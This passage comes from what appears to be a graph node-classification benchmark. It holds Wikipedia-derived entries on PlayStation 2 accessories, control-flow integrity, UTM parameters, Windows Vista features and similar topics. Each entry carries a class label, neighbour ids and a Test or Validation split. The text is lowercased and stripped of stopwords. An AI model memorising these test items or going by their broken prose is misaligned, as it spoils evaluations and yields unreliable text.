scph-10500 included ps2 carries dual-channel stereo audio composite video 576i/50 hz pal 480i/60 hz ntsc identical composite cables available playstation playstation 3 consoles pal territories also come bundled composite/stereo scart adapter block facilitate connection scart enabled tvs merely adapter provides quality improvement direct composite connection s-video cable scph-10060u/97030 carries dual-channel stereo audio s-video 576i/50 hz pal 480i/60 hz ntsc provides clearer picture standard av cable av adaptor video connector scph-10130 break-out box provides additional av-multi port well composite s-video stereo audio connectors allow connection av receiver similar device euro av cable scph-10142 scart cable capable carrying 576i/50 hz 480i/60 hz using rgb standard well standard stereo audio composite video provides clearer picture either s-video composite signals use euro av cable ps2 must set rgb mode options component av cable scph-10490 cable capable carrying 576i/50 hz 480i/60 hz using ypp rgb standards well standard stereo audio via rca connectors provides clearer picture either s-video composite signals also required games support video modes progressive scan 480p 1080i ps1 games output 240p cable may cause compatibility issues newer tv's.to use component av cable ps2 must set ypp mode options d-terminal cable identical component cable connector sold japan uses japanese d-terminal standard playstation 2 vga cable carries rgbhv video via vga connector compatible progressive scan games ps2 linux since ps2 output separate sync sync green must used instead may incompatible monitors memory card 8 mb scph-10020 magic gate used store settings eyetoy video messages savegames official sony memory cards available size 8 mb memory card came black crimson red ocean blue later sony partnered third-party accessories company katana make memory cards came 16 mb 32 mb memory cards officially licensed products playstation 2 logo says magic gate third party memory cards available 128 mb multitap playstation 2 allows four controllers four memory cards attached single controller port memory card slot 8 controllers memory cards may attached console one time using two multitaps simultaneously certain multitaps work specific ps2 models due slight differences slot placement scph-10090 designed fit original consoles scph-70120 instead designed slim consoles eyetoy digital camera device similar webcam playstation 2 originally eyetoys manufactured logitech known logicool japan later models manufactured namtai eyetoy mainly used playing specifically-designed eyetoy games also used capture images videos also compatible playstation 3 ps2 headset connects via usb 1.1 front console headset commonly used online multiplayer games however also used karaoke style games voice control enhance immersive experience single player games 3.5mm audio stereo splitter transfer audio playstation 2 output devices including headphones headset speakers playstation 2 network adapter optional accessory internet multiplayer compatible games although ps2 slim one built ps2 fat network adapter needed purchased official sony playstation 2 usb keyboard mouse came bundled part linux playstation 2 turns non slim ps2 linux computer standard usb keyboard mouse work addition linux kit handful games used keyboard mouse mouse trackball vertical stand attached playstation 2 console allow stand vertically three different versions available scph-10040 original large consoles scph-70110 slimline scph-700xx consoles scph-90110 slimline scph-900xx consoles horizontal stand attached base original fat playstation 2 consoles add height style",
    "neighbors": [
      10368,
      643,
      9091,
      3077,
      11398,
      10761,
      6799,
      9508,
      6311,
      9512,
      684,
      306,
      1587,
      9543,
      10056,
      6732,
      10316,
      6738,
      6873,
      859,
      4060,
      5215,
      607,
      359,
      8937,
      3824,
      5746,
      7028,
      7801,
      8316,
      6781
    ],
    "mask": "Test"
  },
  {
    "node_id": 1092,
    "label": 7,
    "text": "Limnu:limnu limnu online whiteboarding app founded 2015 david debry david hart primarily used educators businesses sketch ideas digital boards via ipad users invite others view edit boards",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 1093,
    "label": 4,
    "text": "Open_Information_Security_Maturity_Model:open information security maturity model open group information security management maturity model o-ism3 information security management framework provides approach designing planning implementing governing information security management systems original motivation behind o-ism3 development narrow gap theory practice information security management systems trigger idea linking security management maturity models o-ism3 strove keep clear number pitfalls previous approaches project looked capability maturity model integration iso 9000 cobit itil standards found potential improvement several fields linking security business needs using process based approach providing additional details implementation suggesting specific metrics preserving compatibility current security management standards open group provides o-ism3 free charge organisations internal noncommercial purposes",
    "neighbors": [
      6360,
      5373,
      8975
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1094,
    "label": 4,
    "text": "Control-flow_integrity:control-flow integrity control-flow integrity cfi general term computer security techniques prevent wide variety malware attacks redirecting flow execution program associated techniques include code-pointer separation cps code-pointer integrity cpi stack canaries shadow stacks vtable pointer verification related implementations available clang microsoft control flow guard return flow guard google indirect function-call checks reuse attack protector rap control flow guard cfg first released windows 8.1 update 3 kb3000850 november 2014 developers add cfg programs adding codice_1 linker flag program linking visual studio 2015 newer windows 10 creators update windows 10 version 1703 windows kernel compiled cfg windows kernel uses hyper-v prevent malicious kernel code overwriting cfg bitmap cfg operates creating per-process bitmap set bit indicates address valid destination performing indirect function call application checks destination address bitmap destination address bitmap program terminates makes difficult attacker exploit use-after-free replacing object contents using indirect function call execute payload protected indirect function calls codice_2 function called performs following steps several generic techniques bypassing cfg",
    "neighbors": [
      1954,
      642,
      6754,
      4582,
      1103,
      4562,
      2262,
      9655,
      7515,
      2558
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1095,
    "label": 9,
    "text": "Unified_Expression_Language:unified expression language java unified expression language special purpose programming language mostly used java web applications embedding expressions web pages java specification writers expert groups java web-tier technologies worked unified expression language first included jsp 2.1 specification jsr-245 later specified jsr-341 part java ee 7 expression language started part javaserver pages standard tag library jstl originally called spel simplest possible expression language expression language el scripting language allowed access java components javabeans jsp since jsp 2.0 used inside jsp tags separate java code jsp allow easier access java components java code years expression language evolved include advanced functionality included jsp 2.0 specification scripting made easier web-content designers little practically knowledge core java language scripting language made jsp scripting language true sense el jsp consisted special tags like scriptlets expressions etc within java code written explicitly el web-content designer needs know make proper calls core java methods el syntactically semantically similar javascript expressions el also liberated programmer know particularities values actually accessed codice_1 mean depending codice_4 either codice_5 codice_6 codice_7 etc development jsp 2.0 javaserver faces technology released also needed expression language expression language defined jsp 2.0 specification n't satisfy needs development jsf technology obvious limitations expressions evaluated immediately jsf components could invoke methods server-side objects powerful language created following new features new expression language worked well purposes jsf developers problems integrating jsp el jsf el conflicts incompatibilities unified expression language initiative started unify expression languages jsp 2.1 expression languages jsp 2.0 jsf 1.1 merged single unified expression language el 2.1 version 3.0 expression language unified longer deemed necessary developed jsr independent jsp jsf specifications jsr-341 new features added notably el equivalents java 8 streams lambda expressions new unified el union jsp jsf expression languages addition features already available jsp el unified el following features shows simple example unified el used within jstl c tag expression calls method parameter",
    "neighbors": [
      9988,
      3462,
      3341,
      10526,
      10020,
      5677,
      6067,
      2106,
      3517,
      6334,
      3518,
      3008,
      10559,
      11582,
      9926,
      1095,
      3278,
      3920,
      1363,
      4959,
      3558,
      1128,
      3560,
      9834,
      3954,
      9590
    ],
    "mask": "None"
  },
  {
    "node_id": 1096,
    "label": 8,
    "text": "UTM_parameters:utm parameters urchin tracking module utm parameters five variants url parameters used marketers track effectiveness online marketing campaigns across traffic sources publishing media introduced google analytics predecessor urchin consequently supported out-of-the-box google analytics utm parameters url identify campaign refers traffic specific website attributes browser website session sessions campaign attribution window expires parameters parsed analytics tools used populate reports example url utm parameters highlighted question mark codice_1 utm parameters url identify marketing campaign refers traffic specific website define append relevant utm parameters appropriate urls marketers routinely use simple spreadsheet-based automated utm builder tools including google analytics url builder websites equivalent chrome extension hyperlink followed contains url utm parameters web analytics software destination website interprets parameter information attributes browser website session sessions campaign attribution window expired default six months google analytics utm parameters passed urls parsed analytics tools google analytics adobe analytics data used populate standard custom analytics reports web analytics software may attribute parameters browser current subsequent sessions campaign window expired five different utm parameters may used order",
    "neighbors": [
      4096,
      10579,
      5524,
      4797
    ],
    "mask": "Test"
  },
  {
    "node_id": 1097,
    "label": 8,
    "text": "Web_Single_Sign-On_Interoperability_Profile:web single sign-on interoperability profile web single sign-on interoperability profile web services federated identity specification published microsoft sun microsystems defines interoperability ws-federation liberty alliance protocols",
    "neighbors": [
      9665,
      10020,
      7878,
      5303,
      2013
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1098,
    "label": 2,
    "text": "Features_new_to_Windows_Vista:features new windows vista compared previous versions microsoft windows new features windows vista numerous covering aspects operating system include new technical features new aspects security safety new networking features new i/o technologies additional management features premium editions windows vista include redesigned user interface visual style named windows aero authentic energetic reflective open aero intended cleaner aesthetically pleasing previous windows versions including glass-like transparencies window animations windows aero also features new default font segoe ui slightly larger size streamlined style wizards change tone phrasing dialogs control panels addition windows aero visual style windows vista home basic exclusively includes windows vista standard theme hardware requirements windows aero therefore uses desktop window manager desktop composition include ability generate live thumbnails running applications allow transparency window frame result 3d effects features associated live thumbnails included theme included versions windows vista basic theme use desktop composition geared towards lower-end machines able use desktop window manager theme comparable windows xp luna theme finally vista includes windows classic windows standard themes similar classic themes windows 2000 windows xp windows aero available windows vista home basic starter editions although desktop window manager included windows vista home basic windows vista start menu undergone major changes taskbar icon longer labeled start instead windows pearl orb top level start menu windows xp two columns menu choices default configuration run printers options appear however items added start menu one chief additions windows vista search pane box users may begin typing immediately contents start menu indexed searchable besides global search index indexing turned search box returns results on-the-fly users type allows start menu act fast powerful application launcher start menu search also doubles run command previous versions windows simply typing command execute run command also added separately right column start menu another major change start menu windows vista longer presents programs menu horizontally expanding cascading list utilizes entire screen space instead nested folder view fixed size list submenus single items appears left column contents back button subfolders expand collapse vertically within list single-clicked tree-like fashion similar windows explorer single items appear top folders appear bottom hovering mouse folder open folder needs clicked limitation new start menu subfolders inside programs menu opened simply searching double clicking also programs installed vertical scroll bar appears two columns dynamically changing icon showing user display picture default present top right column changes users hover item reflect item icon power button action configurable power options control panel though default setting put computer sleep mode users quickly lock user account pressing lock button additional power account related actions listed sub-menu appears small arrow next lock button clicked like windows xp windows vista allows users switch back previous version start menu first introduced windows 95 windows explorer task panel removed integrating relevant task options toolbar favorites pane left contains commonly accessed folders prepopulated search folders seven different views available view files folders namely list details small icons medium icons large icons extra large icons tiles file folder actions cut copy paste undo redo delete rename properties built dropdown menu appears organize button clicked also possible change layout explorer window using organize button users select whether display classic menus search pane preview pane reading pane and/or navigation pane document properties available common 'open 'save dialog boxes easier add metadata author subject document metadata viewed edited details pane shows bottom explorer window navigation pane contains list common folders favorites quick navigation also show folder layout entire hard drive subset contain real folders well virtual ones default contains links folders documents publicly shared folder well virtual folders search present saved virtual folders lists recently changed documents preview pane used preview contents document including viewing pictures size larger thumbnails shown folder listing sampling contents media file without opening additional program explorer show preview image format necessary codec authored using windows imaging component installed also application installs preview handlers like office 2007 documents edited preview pane windows explorer also contains modifications visualization files computer new addition windows explorer details pane displays metadata information relating currently selected file folder windows vista introduces newer ithumbnailprovider interface shows thumbnails details pane well large icon views furthermore different imagery overlaid thumbnails give information file picture frame around thumbnail image file filmstrip video file thumbnails zoomed preview panel allows see thumbnails sorts files view contents documents similar way preview email messages outlook without opening files new intelligent algorithm creation video thumbnails chooses random frame inside video ensures thumbnail black xp showed first frame usually black address bar modified present breadcrumbs view shows full path current location clicking location path hierarchy takes user level instead repeatedly pressing back button pressing button roughly analogous possible prior windows vista pressing small down-arrow next back selecting folder list previously accessed folders makes one level button obsolete removed also possible navigate subfolder current folder using arrow right last item click space right copy edit path manually many microsoft-made windows vista applications menu bar hidden default pressing alt key makes menu bar appear free used space drives shown horizontal indicator bars check boxes allow selection multiple files items grouped clicking group header selects items group multiple groups files also selected clicking group headers holding ctrl icons windows vista visually realistic illustrative icons scalable size 256 × 256 pixels required icon sizes optional sizes document icons show actual document contents several media types distinguished icon overlays video audio photos icons zoomed using gradual slider holding ctrl key using mouse scroll wheel optimize reduce size large icons icons may stored compressed pngs maintain backward compatibility earlier versions windows larger sized icons use lossless png windows explorer includes significant changes previous versions windows terms organization column headers available explorer views allow filtering sorting grouping stacking combined integrated desktop search explorer allows users find organize files new ways stacks stacks view groups files according criterion specified user stacks clicked filter files shown windows explorer windows explorer also sorts files on-the-fly automatically renamed pasted details pane also allows change textual metadata author title files support within windows explorer new type metadata called tags allows users add descriptive terms documents easier categorization retrieval files support open metadata allowing users define new types metadata files box windows vista supports microsoft office documents audio files metadata support file types however added writing property handlers unlike previous versions windows metadata stored inside file always travel file however initially users able add metadata file types moving copying files windows explorer displays full source destination path size number items transfer speed megabytes per second mb/s conflict error encountered terminate copy move delete operation rather file skipped rest files processed end operation errors presented user resolution options available two files name option available rename file previous versions windows options either replace destination file cancel process user also choose apply action conflicts also first time windows processing dates moving trees somewhat consistent every folder subfolder obtained three dates new time operation nature operation file system level create destination folders move files delete origin folders moved folders vista preserve creation modification dates access date gets time operation external data storage device unexpectedly disengaged accidentally removed copying files onto user given chance retry operation without restarting file copy operation beginning gives user chance reconnect external data storage device involved retry operation renaming file even extensions displayed explorer highlights filename without selecting extension renaming multiple files quicker pressing tab automatically renames existing file folder opens file name text field next file renaming shift+tab allow renaming manner upwards case file use locked another application windows explorer informs users close application retry file operation also new interface codice_1 introduced api developers use let applications switch main window application file open simply close file file use dialog running application exposes operations means codice_1 interface windows explorer upon encountering locked file allows user close file switch application dialog box common issue previous windows versions competing applications common tasks tried associate default certain file type using custom user interface default application information particular file type stored registry per-machine basis resulting applications changing another user default program one user defaults changed application querying several different registry values launched windows vista onwards file type associations protocol handlers set per-user basis using new default programs api meaning default programs file types tasks different individual user api calling common user interface applications longer need maintain file association ui default programs api gives applications programmatic way check discover default applications restore single registered defaults query owner specific default file association/protocol launch default programs ui specific application clear per user associations applications need registered install time part default programs windows vista premium ready pcs using alt+tab switch open windows preview open window appears instead program icon addition windows flip 3d enables users flip cascading stack open windows using mouse scroll wheel much like apple cover flow windows stacked rotated 3d provide views simultaneously keyboard shortcuts makes flip 3d disappear releasing ++ keeps flip 3d visible releasing ++ flip open windows backwards window buttons taskbar show thumbnail image window mouse hovers button windows ultimate extras optional features offered users windows vista ultimate accessible windows update include windows dreamscene utility allows videos used desktop backgrounds mui packs windows sound schemes games bitlocker enhancements windows vista features system-wide integrated search called instant search also known windows search instant search designed run significantly faster offers customized search capabilities search boxes added throughout explorer user interface start menu open/save dialog boxes several applications included windows vista default instant search indexes small number folders start menu names files opened documents folder user e-mail beyond searching files search works help control panel networking control panel example typing firewall instantly return applets system firewall natural language search enables queries e-mail user sent week music mozart also supported optional feature search engine uses indexing allow quick display results given search advanced options allow user choose file type indexed properties properties file contents start menu search also doubles run command previous versions windows simply typing command execute indexed search platform based microsoft windows desktop search 3.0 windows search version 4.0 vista sp2 allowing third-party applications e.g microsoft outlook 2007 use indexing platform store metadata perform searches windows vista windows xp windows desktop search redistributable installed contrast search engine windows xp takes time display results user finished typing search string windows vista search allows users add multiple filters continually refine search results file contains word 'example also possible search across rss atom feeds straight windows explorer windows search uses ifilters used windows desktop search well ifilter interface implemented software makers files created applications better integrated search indexing programs searching also done box bottom start menu possible start program typing name example calc start calculator word start microsoft word mail open windows mail web address start default browser particular site default search engine even folder name filename network share name also ability save searches search folder opening folder execute specific search automatically display results normal folder search folder xml file stores search query including search operators well files accessed search run saved query string results presented virtual folder windows vista also supports query composition saved search called scope nested within query string another search windows vista also features enhanced file content search non-indexed locations whereby files scanned processed ifilters would used indexing therefore offering consistent results indexed non-indexed searches well ability third parties add support additional file formats content searched windows sidebar new panel placed either left right-hand side screen user place desktop gadgets small applets designed specialized purpose displaying weather sports scores gadgets also placed parts desktop desired dragging default windows vista ships 11 gadgets calendar clock contacts cpu meter currency conversion feed headlines notes picture puzzle slide show stocks weather additional gadgets published microsoft web site offered microsoft-created user-submitted gadgets gallery feature removed security reasons gadgets written using combination dhtml visual layout jscript vbscript functional code xml file defining gadget metadata author name description etc gadget distributed zip file .gadget extension displaying gadget using dhtml allows gadget used microsoft live.com windows live spaces sites alternatively windows vista gadget detect wpf available take advantage graphical abilities display differently web version internet explorer 7 adds support tabbed browsing atom rss internationalized domain names search box phishing filter anti-spoofing url engine fine-grained control activex add-ons thumbnails open tabs single window called quick tabs page zoom tab groups tab groups make possible open folder favorites tabs single click importing bookmarks cookies web browsers also supported additionally proper support png images transparency well improvements fixes css html rendering windows rss platform offers native rss support developer apis windows vista internet explorer operates special protected mode runs browser security sandbox access rest operating system file system except temporary internet files folder feature aims mitigate problems whereby newly discovered flaws browser activex controls hosted inside allowed hackers subversively install software user computer typically spyware internet explorer 7 windows vista also exclusively supports advanced encryption standard aes key lengths 256 bits outlined rfc 3268 certificate revocation checking using online certificate status protocol tls implementation also updated support extensions outlined rfc 3546 notable server name indication support internet explorer 7 additionally features update wininet api new version better support ipv6 handles hexadecimal literals ipv6 address also includes better support gzip deflate compression communication web server compressed thus require less data transferred internet explorer protected mode support wininet exclusive windows vista later windows versions windows media player 11 features revised interface media library presented without category trees prominent earlier versions rather selecting category left pane contents appear right graphical manner thumbnails—a departure textual presentation information missing album art added directly placeholders library though program re-renders album art imported way 1:1 pixel ratio 200x200 resolution jpeg images views music pictures video recorded tv separate chosen individually navigation bar entries pictures video show thumbnails search upgraded much faster windows media player 11 windows vista home premium ultimate editions supports mmc-5 driver commands aacs content protection scheme well udf file system required blu-ray hd dvd playback however codecs required playback hd dvd blu-ray video included vc-1 mpeg-2 video decoders well dolby digital ac-3 5.1 audio decoder included windows vista home premium ultimate editions h.264 video multichannel surround sound audio standards still require third party decoders features windows media player 11 include certain features media sharing windows media player 11 available windows vista later example windows media player 11 windows vista also connect remote media libraries available windows xp version windows media center windows vista available home premium ultimate editions upgraded significantly including considerable overhaul user interface button main menu contains sections music videos tv gets encased box selected selection submenu comes extending horizontally options selected entries presented grid-like structure item identified album art audio file thumbnail image picture video tv recording related options different views music collection music selected extend horizontally along top grid similarly items identified suggestive artwork grid displaying items also extended horizontally selected item enlarged compared rest features windows media center include windows vista includes internet information services iis version 7 refactored modular architecture integrated .net extensibility instead monolithic server features services iis 7 core web server engine modules offering specific functionality added engine enable features writing extensions iis 7 using isapi deprecated favor module api much iis functionality built api developers much control request process possible prior versions significant change previous versions iis web server configuration information stored solely xml configuration files instead metabase server global configuration file provides defaults virtual web document root subdirectory thereof may contain web.config containing settings augment override defaults changes files take effect immediately marks significant departure previous versions whereby web interfaces machine administrator access required change simple settings default document active modules security/authentication iis 7 also features completely rewritten administration interface takes advantage modern mmc features task panes asynchronous operation configuration asp.net fully integrated administrative interface backup restore center also known windows backup status configuration replaces ntbackup although windows nt backup restore utility available download backup restore center operates two modes backup restore selected files b complete pc backup using complete pc backup incremental snapshots stored external hard disk optical media complete system restored protect hardware failure severe software damage automatic scheduling file backups available vista home basic complete pc backup available vista home basic home premium windows mail replaces outlook express email client previous windows versions incorporates phishing filter like one found ie7 well bayesian junk mail filtering updated monthly via windows update also e-mail messages stored individual files rather binary database reduce frequent corruption make messages searchable real-time backing restoring account setup information configuration mail store made easier however omit features outlook express identities block sender usenet access windows mail replaced windows live mail windows contacts new unified contact personal information management application replaces windows address book wab based new xml based file format contact appears individual .contact file features extensibility apis integration applications store custom information related contacts including display pictures legacy *.wab format open standard *.vcf vcard *.csv comma separated values file formats also supported windows calendar calendar application newly included windows vista supports popular icalendar format well sharing subscribing publishing calendars webdav-enabled web servers network shares windows fax scan available business ultimate enterprise editions windows vista integrated faxing scanning application users send receive faxes fax email scanned documents forward faxes email attachments computer replaces enhances 'fax services component available optional component windows xp connecting scanner fax-capable modem computer users preview documents scanning choose directly fax email scanned documents user interface resembles 'windows mail preview pane tree views etc windows meeting space replacement netmeeting peer-to-peer p2p collaboration application users share applications entire desktop users local network internet windows meeting space allows sharing desktop co-workers distribution collaborative editing documents passing notes participants windows meeting space automatically finds users using people near technology uses ws-discovery see users local network paint new features crop function undo limit raised 3 10 wordpad supports text services framework using windows speech recognition implemented therefore possible dictate text wordpad similar applications support richedit sound recorder rewritten supports recording clips length saving wma however saving wav format supported except n editions windows vista snipping tool first introduced experience pack windows xp tablet pc edition 2005 screen-capture tool allows taking screen shots called snips windows rectangular areas free-form areas snips annotated saved image file html page e-mailed magnifier accessibility tool uses wpf turn uses vector images render content result rendered magnified image sharp pixelated however applies wpf applications non-wpf applications still magnified traditional way also due change introduced wpf 3.5 sp1 functionality lost .net framework 3.5 sp1 installed microsoft also released magnification api allow assistive technology applications use magnifier engine windows photo gallery photo video library management application import digital cameras tag rate individual pictures including custom metadata based extensible metadata platform also allows basic editing images adjusting color exposure resizing cropping red-eye reduction printing slideshows pan fade effects also created burnt dvd allows custom metadata added images videos enables searching attributes also supports raw image format natively open organize image format image codecs installed windows imaging component images videos may viewed windows photo gallery viewer options zoom pan losslessly rotate images pause play videos bring info pane view edit metadata photo video icc v4 color profiles embedded images also supported photo print wizard improved offer lot customizability upgraded version windows live photo gallery allows upload share photos videos online part windows live services windows movie maker supports smooth direct3d-based effects transitions editing outputting hd video importing recorded dvr-ms format videos well burning output movie cd windows vista home premium ultimate editions import hdv video camcorders output video windows dvd maker creating dvd-video discs new effects transitions added windows vista movie maker versions require pixel shader hardware support windows dvd maker dvd creation application applications also pass xml file dvd maker authoring burning games minesweeper solitaire hearts freecell spider solitaire updated rewritten take advantage windows vista new graphics capabilities also included new games namely purble place chess titans mahjong titans inkball game previously available windows xp tablet pc edition included also played using mouse pinball dropped september 2008 users ultimate edition windows vista also download texas hold 'em poker microsoft tinker windows ultimate extras beginning early 2002 microsoft announcement trustworthy computing initiative great deal work gone making windows vista secure operating system predecessors internally microsoft adopted secure development lifecycle underlying ethos secure design secure default secure deployment new code windows vista developed sdl methodology existing code reviewed refactored improve security significant discussed security features included windows vista include user account control kernel patch protection bitlocker drive encryption mandatory integrity control digital rights management tcp/ip stack security improvements address space layout randomization encrypting file system cryptography improvements additionally windows vista includes range parental controls give owners computer set tools limit accounts computer improved windows firewall supports inbound outbound packet filtering ipv6 connection filtering detailed configurable rules policies windows vista contains range new technologies features intended help network administrators power users better manage systems notable changes include complete replacement ntldr based windows preinstallation environment completely rewritten image-based deployment mechanisms significantly improved task scheduler revamped event logging infrastructure windows recovery environment support per-application remote desktop sessions new diagnostic health monitoring system administration tools range new group policy settings covering many new features previous versions iis included windows xp hard limits concurrent connections defined web servers iis 7.0 windows vista limit number connections allowed limit workloads based active concurrent requests 10 desktop window manager new windowing system handles drawing content screen instead windows drawing directly video card memory buffers contents instead rendered back-buffers technically direct3d surfaces arranged appropriate z-order displayed user drawing method uses significantly video memory traditional window-drawing method used previous versions windows required enough memory contain composite currently visible windows given time entire contents windows stored video memory user move windows around screen smoothly without tearing artifacts visible operating system asks applications redraw newly visible parts windows features new windows vista live thumbnail window previews flip 3d implemented dwm users need directx 9 capable video card able use desktop window manager machines ca n't use dwm fall back basic theme use screen drawing methods similar windows xp desktop window manager included editions windows vista except starter edition windows vista includes new version direct3d called direct3d 10 adds scheduling memory virtualization capabilities graphics subsystem forgoes current directx practice using capability bits indicate features active current hardware instead direct3d 10 defines minimum standard hardware capabilities must supported display system direct3d 10 compatible microsoft goal create environment developers designers assured input provide rendered exactly fashion supported graphics cards recurring problem directx 9 model different video cards produced different results thus requiring fixes keyed specific cards produced developers according microsoft direct3d 10 able display graphics 8 times faster directx 9.0c new improved windows display driver model wddm addition direct3d 10 incorporates microsoft high-level shader language 4.0 however direct3d 10 backward compatible like prior versions directx game compatible direct3d 10 direct3d 9 games would need developed apis one version direct3d 9 targeting windows versions prior windows vista another version using direct3d 10 targeting windows vista windows vista however contain backward-compatible direct3d 9 implementation direct3d 10 api introduces unified vertex shader pixel shader also supports geometry shaders operate entire geometric primitives points lines triangles allow calculations based adjacent primitives well output geometry shader passed directly onwards rasterizer interpolation pixel shading written vertex buffer known 'stream fed back beginning pipeline d3d10 functionality requires wddm new graphics hardware graphics hardware pre-emptively multithreaded allow multiple threads use gpu turns also provide paging graphics memory version direct3d 9 available windows vista called direct3d 9ex modified api also uses wddm allows direct3d 9 applications access features available windows vista cross-process shared surfaces managed graphics memory prioritization resources text anti-aliasing advanced gamma functions device removal management deprecation directx apis windows vista direct3d features overhaul directx sdk mentions apis deprecated directinput directplay deprecated components removed directsound therefore directmusic lack hardware abstraction emulated software directmusic kernel mode synthesizer supplies directmusic components high-resolution timer removed windows vista introduces directx video acceleration dxva 2.0 enhances implementation video pipeline adds host ddis including capture ddi video capture ddis shares dxva 1.0 also enhanced support hardware acceleration operations also ddi functions directly available callers need mediated video renderer pipelines simply decoding media without rendering post-processing rendering without decoding also created features require windows display driver model drivers windows vista also introduces new video renderer available media foundation component directshow filter called enhanced video renderer evr evr designed work desktop window manager dxva 2.0 supports enhanced video renderer video renderer windows vista dxva integrates media foundation allows dxva pipelines exposed media foundation transforms mfts even decoder pipelines post-processing pipelines exposed mfts used media foundation topology loader create full media playback pipeline dxva 1.0 emulated using dxva 2.0 windows imaging component wic new extensible imaging framework allows applications supporting framework automatically get support installed codecs graphics file formats windows presentation foundation applications also automatically support installed image codecs third party developers write image codecs specific image file formats default windows vista ships jpeg tiff gif png bmp hd photo codecs codecs raw image formats used generally high-end digital cameras also supported manner windows explorer windows photo gallery windows photo gallery viewer based new framework thus view organize images format necessary codecs installed hd photo previously known windows media photo photographic still image file format introduced windows vista supports features high dynamic range imaging lossy well lossless compression 32-bpp fixed floating point representation transparency rgb cmyk n-channel color spaces radiance rgbe embedded icc color profiles multiple images per file support exif xmp metadata formats preferred image format xps documents windows vista features windows color system wcs platform color management goal obtain color consistency across various software hardware including cameras monitors printers scanners different devices interpret colors differently according software hardware configurations result must properly calibrated reproduce colors consistently across different devices wcs aims make process color calibration automatic transparent evolution icc color profiles windows color system based completely new color infrastructure translation engine cite backed new color processing pipeline supports bit-depths 32 bits per pixel multiple color channels 3 alternative color spaces high dynamic range coloring using technology named kyuanos developed canon color processing pipeline allows device developers add gamut mapping algorithm pipeline customize color response device new pipeline also uses floating point calculations minimize round-off losses inherent integer processing color pipeline finishes processing colors cite engine applies color transform according color profile specific device ensure output color matches expected wcs features explicit support lcd well crt monitors projectors printers imaging devices provides customized support wcs uses color profiles according cie color appearance model recommendation ciecam02 defined using xml define color representation actually translates visible color icc v4 color profiles also supported windows photo gallery photo viewer windows imaging component hd photo format xps print path xps documents support color management significant changes made windows vista mobile computing windows vista aims simplify detection configuration installation external displays projectors introducing standardized setup procedure interface wddm architecture windows vista enables hot plug detection external displays alerts new transient multimon manager tmm external display connected system presents aero wizard interface configuration setup display previous versions windows installation routines displays often varied based hardware configurations function keys specific manufacturer requirements typically required separate software interfaces possible tmm also saves user preferences individual displays improve mobility scenarios preferences restored display reconnected different time location aforementioned improvements intended enable display connectivity experience provides ease use observed plug play peripherals windows vista also includes window management improvements applications respond changing monitor environments example monitor disconnected window occupies display operating system move window back primary display remains visible application developers also respond changing monitor conditions presentation active windows vista disables idle sleep timers system notifications may optionally enable variety settings specified user presentation settings users may customize include ability disable screen saver adjust volume levels temporarily display specific background image display and/or change position automatically enable presentation settings individual display configurations windows vista also introduces aero wizard interface detection connection networked projectors operating system automatically search projectors connected local network users manually enter address projector connect devices profile web services aims simplify configuration installation management network projectors networked devices windows vista aims simplify power management schemes presenting clear names power schemes reducing total number default power schemes following three addition battery meter interface notification area aims provide enhanced discoverability power schemes windows vista providing single-click access default schemes link change additional power management settings via power options control panel applet also included microsoft stated aforementioned changes windows vista result confusion caused power schemes previous versions windows numerous difficult discover often included names confused users example users would frequently select minimal power management scheme desired preserve battery life scheme actually minimized power savings designed maximize performance windows vista allows fine-grained control power settings setting power saving mode wireless adapters usb selective suspend pci express link state power management processor state etc. also allows configuring power settings specific scenarios sharing media files giving presentation adaptive display mode indexing files windows vista also supports usb selective suspend wider range class drivers previous versions windows belonging bluetooth classes portable devices video classes beginning service pack 1 windows vista turn periodic vsync interrupt counting cpu screen refreshed new graphics mouse activity result significant energy savings windows vista sleep mode default power state desktop computers mobile pcs laptops sleep mode replaces standby mode seen previous versions windows ensure sleep mode transitions reliable windows vista default allow applications drivers veto sleep process vetoing sleep process—which prevents operating system idling sleep responding sleep requests users—was significant source power transition failures previous versions windows often resulted decreased battery life overheated systems potential data loss eventual user distrust power-saving capabilities development windows vista microsoft indicated would allow sleep process vetoed operating system subsequent investigations company revealed capability frequently abused application developers however administrators still enable veto functionality group policy windows vista introduces new hybrid sleep power-saving mode combines hibernation sleep mode functionality active hybrid sleep saves information computer memory hibernation file disk instead turning computer initiates sleep mode traditionally systems lose power sleep mode also lose data resident memory however since systems resume hybrid sleep retrieving information hibernation file disk offer benefits quickly resuming sleep mode improved reliability event power loss hybrid sleep enabled default desktop computers typically include uninterruptible power supply disabled default laptops mobile devices typically carry additional power source battery hybrid sleep requires compatible wddm driver windows vista introduces new away mode power management feature allows machine conserve power performing background tasks recording streaming media files across devices systems functionality essentially allows pc operate manner similar consumer electronics device enabled away mode turns pc display mutes audio filters access input devices allowing remain otherwise operational background tasks away mode provides power-saving benefits disables features necessary desired operation media streaming microsoft emphasized primarily developed entertainment media scenarios intended replacement traditional power-saving modes windows hotstart formerly windows direct also known direct media mode enables user immediately launch application startup resume press button wireless receiver events designed provide instant feature availability traditionally associated mobile devices cell phones portable media players hotstart enables microsoft referred appliance-like availability allowing pc take number roles based type application launched—a pc boots multimedia application example essentially function dedicated media device original equipment manufacturers customize hotstart hardware implementation functionality users may also customize application launch functionality windows registry instead launching multimedia application user example configure hotstart button form input instantly launch e-mail application hotstart enables direct immediate access application multimedia result power savings windows vista includes nine new western latin greek cyrillic font families optimized cleartype four new asian segoe-like fonts added windows vista supports languages previous versions windows usually asian e.g khmer lao addition windows vista enterprise ultimate editions allow installing additional languages using mui packs instead install language unicode font character support also improved windows vista also supports custom locales allowing users create locale data use applications using locale builder tool",
    "neighbors": [
      10243,
      11270,
      5643,
      4624,
      9744,
      11283,
      537,
      540,
      3102,
      4127,
      2593,
      4130,
      7713,
      8227,
      3109,
      8740,
      9762,
      11301,
      1577,
      4138,
      6697,
      8747,
      1581,
      4141,
      10281,
      4146,
      4658,
      4148,
      1077,
      2101,
      10812,
      3648,
      582,
      7754,
      10828,
      4173,
      4174,
      10829,
      9808,
      4178,
      10839,
      603,
      9819,
      8798,
      4704,
      1121,
      3170,
      10338,
      7780,
      8296,
      617,
      5225,
      8299,
      3181,
      622,
      9839,
      4210,
      7796,
      6265,
      7290,
      4731,
      636,
      8315,
      639,
      10879,
      641,
      8328,
      8841,
      651,
      6797,
      10896,
      2193,
      9874,
      2196,
      10900,
      4248,
      9377,
      3235,
      4771,
      6820,
      1703,
      2221,
      3250,
      5300,
      9910,
      2749,
      8391,
      200,
      9420,
      10957,
